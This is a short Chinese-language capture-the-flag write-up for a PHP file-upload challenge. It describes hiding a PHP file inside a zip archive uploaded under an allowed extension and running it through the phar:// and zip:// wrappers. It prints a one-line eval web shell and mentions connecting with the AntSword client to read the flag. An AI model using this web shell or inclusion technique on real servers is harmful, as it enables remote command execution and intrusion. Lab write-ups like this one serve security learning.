开始可以看到访问upload文件会自动补全后缀,然后上传一张1.jpg文件可以上传成功但是没什么用,还可以题目说还可以上传压缩包,那么可以利用phar://协议和zip://协议
- phar://协议
- phar:///tmp/zip.jpg/1.php
- /tmp/zip.jpg 表示要解析的压缩包,与扩展名无关,如只允许abc格式文件上传,那么可以上传zip.abc格式压缩包
- 1.php表示压缩包中的文件
- zip://和phar://不同的是压缩包和文件分隔符不一样,使用#
- zip:///tmp/zip.jpg#1.php
如果限制了扩展名且能上传压缩包时,可以将文件放进压缩包再上传,然后使用伪协议读取
写个一句话木马,内容如下:
<?php phpinfo(); @eval($_POST["cmd"]); ?>
将其压缩为压缩包,并上传
上传成功并且可以下载导,用伪协议读取一下
可以看到phpinfo();执行成功
然后蚁剑连接在根目录下可以看到flag
